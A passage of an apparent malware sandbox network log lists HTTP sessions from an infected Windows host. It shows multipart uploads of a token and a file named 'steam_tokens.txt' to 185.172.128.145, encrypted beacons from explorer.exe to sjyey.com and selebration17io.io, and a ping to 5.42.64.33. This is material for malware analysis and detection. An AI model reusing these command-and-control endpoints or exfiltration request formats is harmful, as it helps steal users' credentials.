74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 2d 2d 0d 0a Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="file"------FCFBFBFBKFIDHJKFCAFC--
Feb 21, 2024 00:23:26.895798922 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:27.040077925 CET	205	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA Host: 185.172.128.145 Content-Length: 142023 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:27.738168001 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:27.849618912 CET	472	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ Host: 185.172.128.145 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"jbdtaijovg------KKFCFBKFCFBFIDGCGDHJ--
Feb 21, 2024 00:23:28.188656092 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49744	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:17.005686998 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://csiwevuwwlicsvth.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: sjyey.com
Feb 21, 2024 00:23:17.005729914 CET	363	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 31 fc 89 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vug1RPsT^rza'tpOPuo\l"xB1k96EOr">n0<9B/au'%Z_"'&a
Feb 21, 2024 00:23:18.111002922 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:17 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 82 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49747	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:18.412252903 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ygdskxvclfbimxph.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: sjyey.com
Feb 21, 2024 00:23:18.412290096 CET	137	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 31 58 c0 88 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vu1XcGSe@r'R\b-V;w`gYTD
Feb 21, 2024 00:23:19.515194893 CET	587	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49749	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:19.810363054 CET	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prqgcnfmgih.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 176 Host: sjyey.com
Feb 21, 2024 00:23:19.810406923 CET	176	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 33 4a c9 8d Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vu3JZCb8=7I<_m2ymRN%8)ZN>\1L^%a
Feb 21, 2024 00:23:20.902503967 CET	587	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49750	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:21.196645975 CET	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://advoxwggvvvcod.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: sjyey.com
Feb 21, 2024 00:23:21.196710110 CET	242	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2b 4e c7 8e Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vu+N[WyA}WaVsy're,RG[X0"BFIiLG5nY61ME8<K'W,-n$uPv^HOolh9,
Feb 21, 2024 00:23:22.037013054 CET	587	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:21 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49751	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:22.340408087 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rquwvlghqdtvnmba.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: sjyey.com
Feb 21, 2024 00:23:22.340492964 CET	231	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2b 3b d8 be Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vu+;x4yOa&m2W`@VGzbo*3JLN+<[O{,q?iRG^l>QXo0u%rkx~Hx
Feb 21, 2024 00:23:23.435820103 CET	587	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:22 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49752	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:23.741353989 CET	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hypfqvnvsca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: sjyey.com
Feb 21, 2024 00:23:23.741389036 CET	301	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 4d 3f ad e8 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vuM?mFtus<gL(t J8!aj:t/+-+r&_ (I0r_"=vj"Y(}M)\|xi^%CY$
Feb 21, 2024 00:23:24.931261063 CET	587	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:24 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49753	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:26.054600000 CET	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://etdyxanscapwx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: sjyey.com
Feb 21, 2024 00:23:26.054630041 CET	211	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3b 4f b9 b9 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA -[k,vu;OTO@vu#%v9er^,Q]JD_!)NAwS>GQ^_S,{=o;[Pr
Feb 21, 2024 00:23:27.156078100 CET	305	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:23:26 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 59 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 6f 47 e6 3d 1e f3 fd 45 f6 8d f6 a3 2c c6 7e 87 ac 6d 59 1a 81 c5 ad cb 65 d7 36 32 16 90 0e 85 5e 7f 1d 51 a5 9e Data Ascii: #\6oG=E,~mYe62^Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49759	5.42.64.33	80	4144	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:23:35.597868919 CET	139	OUT	GET /ping.php?substr=four HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 5.42.64.33 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:35.772159100 CET	419	IN	HTTP/1.1 404 Not Found X-Powered-By: Express Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Content-Length: 147 Date: Tue, 20 Feb 2024 23:23:35 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49762	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:07.115287066 CET	287	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fcbfgqcrflouurm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: selebration17io.io
Feb 21, 2024 00:24:07.115362883 CET	211	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 93 b1 08 c9 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bOQ{#C,Xme&rfQ#(@)mP(#Y."A)#\JVV7gcsq+'#h!wK+3
Feb 21, 2024 00:24:07.338289022 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49765	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:10.514879942 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rrvwuynafikwa.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: selebration17io.io
Feb 21, 2024 00:24:10.514879942 CET	330	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e1 f5 26 d8 Data Ascii: H;YWXr Vw#*kqD/jqJ,,P;}f=B!bO&oa!R7=u=Y"/J.}uQO'jG.WEGK%"Gb Hr9reQ/U^)B[&LX@h)U9)4
Feb 21, 2024 00:24:10.745048046 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49766	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:19.163145065 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nnfrlgvehwypac.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: selebration17io.io
